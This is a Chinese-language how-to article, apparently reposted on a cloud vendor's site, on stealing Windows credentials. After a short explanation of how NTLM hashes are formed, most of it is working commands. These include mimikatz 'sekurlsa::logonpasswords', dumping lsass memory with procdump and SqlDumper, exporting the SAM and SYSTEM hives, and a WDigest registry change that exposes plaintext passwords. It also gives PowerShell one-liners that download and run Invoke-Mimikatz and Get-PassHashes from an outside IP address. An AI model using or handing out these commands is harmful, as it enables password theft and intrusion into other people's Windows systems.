您好,登錄后才能下訂單哦!
今天就跟大家聊聊有關如何進行windows hash的抓取,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。
windows hash由二部分組成,分別是LM HASH和NTLM HASH,這是對同一個密碼的兩種不同的加密方式。
組成為:username:RID:LM-HASH值:NTLM-HASH值
NTLM-Hash的生成方法為:
1.將明文口令轉換成十六進制的格式
2.轉換成Unicode格式,即在每個字節之后添加0x00
3.對Unicode字符串作MD4加密,生成32位的十六進制數字串
例如
賬戶密碼為cseroad@2008
十六進制為 637365726f61644032303038
Unicode字符串為 63007300650072006f006100640040003200300030003800
NTLM-Hash為 82c58d8cec50de01fd109613369c158e
LM-Hash(LAN Manager Hash)是微軟的一種散列加密算法,本質為DES加密,具體原理參考LM-Hash && NTLM-Hash
當LM Hash是AAD3B435B51404EEAAD3B435B51404EE 這表示空密碼或者是未使用LM_HASH。
這里不做過多解釋,因為從Windows Server 2008版本開始,系統禁用了LM hash。
原理:lsass.exe進程用于實現windows安全策略(本地安全策略和登錄策略)。可以使用工具將散列值和明文密碼從內存的lsass.exe進程或者SAM文件中導出。SAM文件保存在C:\Windows\System32\config目錄下,該文件被鎖定,不允許復制。
以下工具都以管理員身份運行
該工具支持Windows XP/2003/Vista/7/2008版本,且相當穩定。
可以抓取windows平臺下多種類型的用戶憑據,包括:本地帳戶、域帳戶、緩存的域帳戶。
下載地址:https://codeload.github.com/quarkslab/quarkspwdump/zip/master
完整源代碼可以從https://github.com/quarkslab/quarkspwdump獲取
Quarkspwdump.exe --dump-hash-local 導出用戶的NTLM Hash
LaZagne是一款用于檢索大量存儲在本地計算機密碼的開源應用程序。
該工具不僅能抓取windows密碼,還可以抓取瀏覽器中的緩存的密碼、SVN密碼、wifi密碼、郵箱密碼等功能,適用于windows、Linux、MAC
下載地址 https://github.com/AlessandroZ/LaZagne
運行命令
LaZagne.exe all
該工具由閃電小子根據mimikatz編譯,可以直接獲取明文密碼。直接運行getpass.exe即可。
拷貝libeay32.dll和Pwdump7.exe在同一目錄下直接運行Pwdump7.txt即可
該工具分為32位、64位。它可以列舉登陸會話,并且可以添加、改變和刪除相關憑據。命令為
wce.exe -w 讀取系統明文密碼
wme.exe -l 獲取hash
cmd直接運行命令
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Get-PassHashes.ps1');Get-PassHashes
cmd直接運行命令
powershell iex (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
依然使用的mimikatz讀取密碼
powershell IEX (New-Object Net.WebClient).DownloadString('http://47.94.80.xxx/ps/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
獲取lsass.exe的dumps
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); "Get-Process lsass | Out-Minidump"
再用mimikatz從dumps中獲取明文。
mimikatz.exe "sekurlsa::minidump lsass_528.dmp" "sekurlsa::logonPasswords full" exit
可用來抓取hash以及明文。命令為
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
當系統為win10或2012R2以上時,默認在內存緩存中禁止保存明文密碼,此時可以通過修改注冊表的方式抓取明文,但需要用戶重新登錄后才能成功抓取。修改注冊表命令為:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
重啟后可抓取hash
導出導出SAM和System文件
reg save HKLM\SYSTEM sys.hiv reg save HKLM\SAM sam.hiv
將注冊表的SAM、System文件導出到本地磁盤。使用mimikatz讀取SAM和System文件。可獲取NTLM Hash
mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit
在得到session的基礎上,嘗試抓取hash值。metasploit支持多種hash獲取。
1.hashdump命令在system權限下,可抓取hash
2.windows/gather/smart_hashdump 腳本可以獲取域內的用戶 hash
并將所有hash導出到/root/.msf4/loot/20200218155855_default_10.211.55.16_windows.hashes_396577.txt
3.load mimikatz 命令加載mimikatz
msv 獲取hash kerberos 獲取明文 ssp 獲取明文信息 tspkg 嘗試檢索tspkg憑據 wdigest 嘗試檢索wdigest憑據 mimikatz_command -f samdump::hashes 獲取hash mimikatz_command -f sekurlsa::searchPasswords 獲取明文密碼
Dump Hashes #獲取hash Run Mimikatz #運行 Mimikatz
在beacon在執行的命令對應
hashdump 獲取hash值 logonpasswords 相當于mimikatz_command -f sekurlsa::searchPasswords
Empire也是內置了mimikatz來讀取hash。
該工具是微軟出品的工具,具有一定免殺效果。可以利用procdump把lsass進程的內存文件導出本地,再在本地利用mimikatz讀取密碼。
procdump.exe -accepteula -ma lsass.exe lsass.dmp 導出lsass.dmp
再使用mimikatz讀取密碼
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
需要注意的是從目標機器導出的lsass.dmp需要在相同系統下運行。
該工具也是微軟出品,也具備一定免殺能力。
SqlDumper.exe默認存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。如果目標機器沒有安裝SQL Server,自己上傳SqlDumper.exe
tasklist /svc | findstr lsass.exe 查看lsass.exe 的ProcessID
Sqldumper.exe ProcessID 0 0x01100 導出dump文件
mimikatz加載dump文件
mimikatz.exe "sekurlsa::minidumpSQLDmpr0002.mdmp" "sekurlsa::logonPasswords full" exit
Out-Minidump.ps1 腳本C#版本編譯后的結果。
把lsass.exe進程數據導出來dump的文件的后綴名為bin,拖到本地機器上后,先重命名為 zip,然后再解壓并使用本地的mimikatz進行讀取。
mimikatz.exe "sekurlsa::minidump debug520" "sekurlsa::logonPasswords full" "exit"
看完上述內容,你們對如何進行windows hash的抓取有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。